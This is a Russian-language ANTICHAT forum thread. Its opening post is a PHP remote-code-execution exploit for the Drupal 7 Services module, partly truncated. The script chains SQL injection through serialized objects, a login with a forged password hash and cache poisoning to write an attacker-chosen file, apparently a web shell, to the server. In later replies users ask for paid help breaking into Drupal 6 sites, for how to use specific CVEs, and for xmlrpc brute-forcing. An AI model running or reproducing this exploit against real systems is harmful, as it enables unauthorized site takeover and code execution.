ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

10.03.2017, 12:04
|
|
Guest
Сообщений: n/a
Провел на форуме: 216062
Репутация:
231
|
|
Drupal 7.x Services Module Remote Code Execution
Код:
Code:
#!/usr/bin/php
''dixuSOspsOUU.php'',
''data'' => ''''
];
$browser = new Browser($url . $endpoint_path);
# Stage 1: SQL Injection
class DatabaseCondition
{
protected $conditions = [
"#conjunction" => "AND"
];
protected $arguments = [];
protected $changed = false;
protected $queryPlaceholderIdentifier = null;
public $stringVersion = null;
public function __construct($stringVersion=null)
{
$this->stringVersion = $stringVersion;
if(!isset($stringVersion))
{
$this->changed = true;
$this->stringVersion = null;
}
}
}
class SelectQueryExtender {
# Contains a DatabaseCondition object instead of a SelectQueryInterface
# so that $query->compile() exists and (string) $query is controlled by
us.
protected $query = null;
protected $uniqueIdentifier = QID;
protected $connection;
protected $placeholder = 0;
public function __construct($sql)
{
$this->query = new DatabaseCondition($sql);
}
}
$cache_id = "services:$endpoint:resources";
$sql_cache = "SELECT data FROM {cache} WHERE cid=''$cache_id''";
$password_hash = ''$S$D2NH.6IZNb1vbZEV1F0S9fqIz3A0Y1xueKznB8vWrMsnV/nrTpnd'';
# Take first user but with a custom password
# Store the original password hash in signature_format, and endpoint cache
# in signature
$query =
"0x3a) UNION SELECT ux.uid AS uid, " .
"ux.name AS name, ''$password_hash'' AS pass, " .
"ux.mail AS mail, ux.theme AS theme, ($sql_cache) AS signature, " .
"ux.pass AS signature_format, ux.created AS created, " .
"ux.access AS access, ux.login AS login, ux.status AS status, " .
"ux.timezone AS timezone, ux.language AS language, ux.picture " .
"AS picture, ux.init AS init, ux.data AS data FROM {users} ux " .
"WHERE ux.uid<>(0"
;
$query = new SelectQueryExtender($query);
$data = [''username'' => $query, ''password'' => ''ouvreboite''];
$data = serialize($data);
$json = $browser->post(TYPE_PHP, $data);
# If this worked, the rest will as well
if(!isset($json->user))
{
print_r($json);
e("Failed to login with fake password");
}
# Store session and user data
$session = [
''session_name'' => $json->session_name,
''session_id'' => $json->sessid,
''token'' => $json->token
];
store(''session'', $session);
$user = $json->user;
# Unserialize the cached value
# Note: Drupal websites admins, this is your opportunity to fight back :)
$cache = unserialize($user->signature);
# Reassign fields
$user->pass = $user->signature_format;
unset($user->signature);
unset($user->signature_format);
store(''user'', $user);
if($cache === false)
{
e("Unable to obtains endpoint''s cache value");
}
x("Cache contains " . sizeof($cache) . " entries");
# Stage 2: Change endpoint''s behaviour to write a shell
class DrupalCacheArray
{
# Cache ID
protected $cid = "services:endpoint_name:resources";
# Name of the table to fetch data from.
# Can also be used to SQL inject in DrupalDatabaseCache::getMultiple()
protected $bin = ''cache'';
protected $keysToPersist = [];
protected $storage = [];
function __construct($storage, $endpoint, $controller, $action) {
$settings = [
''services'' => [''resource_api_version'' => ''1.0'']
];
$this->cid = "services:$endpoint:resources";
# If no endpoint is given, just reset the original values
if(isset($controller))
{
$storage[$controller][''actions''][$action] = [
''help'' => ''Writes data to a file'',
# Callback function
''callback'' => ''file_put_contents'',
# This one does not accept "true" as Drupal does,
# so we just go for a tautology
''access callback'' => ''is_string'',
''access arguments'' => [''a string''],
# Arguments given through POST
''args'' => [
0 => [
''name'' => ''filename'',
''type'' => ''string'',
''description'' => ''Path to the file'',
''source'' => [''data'' => ''filename''],
''optional'' => false,
],
1 => [
''name'' => ''data'',
''type'' => ''string'',
''description'' => ''The data to write'',
''source'' => [''data'' => ''data''],
''optional'' => false,
],
],
''file'' => [
''type'' => ''inc'',
''module'' => ''services'',
''name'' => ''resources/user_resource'',
],
''endpoint'' => $settings
];
$storage[$controller][''endpoint''][''actions''] += [
$action => [
''enabled'' => 1,
''settings'' => $settings
]
];
}
$this->storage = $storage;
$this->keysToPersist = array_fill_keys(array_keys($storage), true);
}
}
class ThemeRegistry Extends DrupalCacheArray {
protected $persistable;
protected $completeRegistry;
}
cache_poison($endpoint, $cache);
# Write the file
$json = (array) $browser->post(TYPE_JSON, json_encode($file));
# Stage 3: Restore endpoint''s behaviour
cache_reset($endpoint, $cache);
if(!(isset($json[0]) && $json[0] === strlen($file[''data''])))
{
e("Failed to write file.");
}
$file_url = $url . ''/'' . $file[''filename''];
x("File written: $file_url");
# HTTP Browser
class Browser
{
private $url;
private $controller = CONTROLLER;
private $action = ACTION;
function __construct($url)
{
$this->url = $url;
}
function post($type, $data)
{
$headers = [
"Accept: " . TYPE_JSON,
"Content-Type: $type",
"Content-Length: " . strlen($data)
];
$url = $this->url . ''/'' . $this->controller . ''/'' . $this->action;
$s = curl_init();
curl_setopt($s, CURLOPT_URL, $url);
curl_setopt($s, CURLOPT_HTTPHEADER, $headers);
curl_setopt($s, CURLOPT_POST, 1);
curl_setopt($s, CURLOPT_POSTFIELDS, $data);
curl_setopt($s, CURLOPT_RETURNTRANSFER, true);
curl_setopt($s, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($s, CURLOPT_SSL_VERIFYPEER, 0);
$output = curl_exec($s);
$error = curl_error($s);
curl_close($s);
if($error)
{
e("cURL: $error");
}
return json_decode($output);
}
}
# Cache
function cache_poison($endpoint, $cache)
{
$tr = new ThemeRegistry($cache, $endpoint, CONTROLLER, ACTION);
cache_edit($tr);
}
function cache_reset($endpoint, $cache)
{
$tr = new ThemeRegistry($cache, $endpoint, null, null);
cache_edit($tr);
}
function cache_edit($tr)
{
global $browser;
$data = serialize([$tr]);
$json = $browser->post(TYPE_PHP, $data);
}
# Utils
function x($message)
{
print("$message\n");
}
function e($message)
{
x($message);
exit(1);
}
function store($name, $data)
{
$filename = "$name.json";
file_put_contents($filename, json_encode($data, JSON_PRETTY_PRINT));
x("Stored $name information in $filename");
}
|
|
|
|

10.03.2017, 16:32
|
|
Guest
Сообщений: n/a
Провел на форуме: 96779
Репутация:
5
|
|
Зачем 2 одинаковых поста?
|
|
|
|

26.03.2017, 01:40
|
|
Участник форума
Регистрация: 16.02.2008
Сообщений: 177
Провел на форуме: 883446
Репутация:
82
|
|
вечно ругается на эту строку "28" $file = [
|
|
|

02.05.2017, 14:31
|
|
Guest
Сообщений: n/a
Провел на форуме: 669
Репутация:
0
|
|
может кто то с 6.22 помочь на возмездной основе?
|
|
|
|

03.06.2017, 02:17
|
|
Guest
Сообщений: n/a
Провел на форуме: 359
Репутация:
0
|
|
[Quote = "leokomaro, de la publicación: 4079266, miembro de: 302606"] alguien puede ayudar con un 6,22 sobre una base reembolsable [/ quote]?
https://cxsecurity.com/issue/WLB-2016070020
alguien sabe otra vulnerabilidad a 6.22?
|
|
|
|

19.06.2017, 21:44
|
|
Guest
Сообщений: n/a
Провел на форуме: 669
Репутация:
0
|
|
CVE-2016-3168 вот это кто нибудь может объяснить как использовать?
|
|
|
|

09.07.2017, 20:29
|
|
Guest
Сообщений: n/a
Провел на форуме: 60408
Репутация:
0
|
|
Пацаны,
Drupal 6.28, 2013-01-16
----------------------
- Fixed security issues (multiple vulnerabilities), see SA-CORE-2013-001.
реально ли это взломать?
|
|
|
|

09.10.2017, 01:49
|
|
Guest
Сообщений: n/a
Провел на форуме: 701
Репутация:
0
|
|
Подскажите, возможен в друпале xmlrpc брут?
в wp все предельно просто, делаешь xml Запрос с параметрами и все работает, а какие параметры у друпала? информация в сети очень древняя.
Если это реально, можно пример?
|
|
|
|

22.04.2018, 15:02
|
|
Guest
Сообщений: n/a
Провел на форуме: 51991
Репутация:
2
|
|
Паблик экспа Drupalgeddon2 только при открытой реги отрабатывает?
|
|
|
|

07.05.2018, 03:06
|
|
Guest
Сообщений: n/a
Провел на форуме: 47768
Репутация:
119
|
|
Сообщение от Zen1T21
Zen1T21 said:
↑
Паблик экспа Drupalgeddon2 только при открытой реги отрабатывает?
Паблик экспа Drupalgeddon2 ни в каком случае не отрабатывает, защита от дурака стоит.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|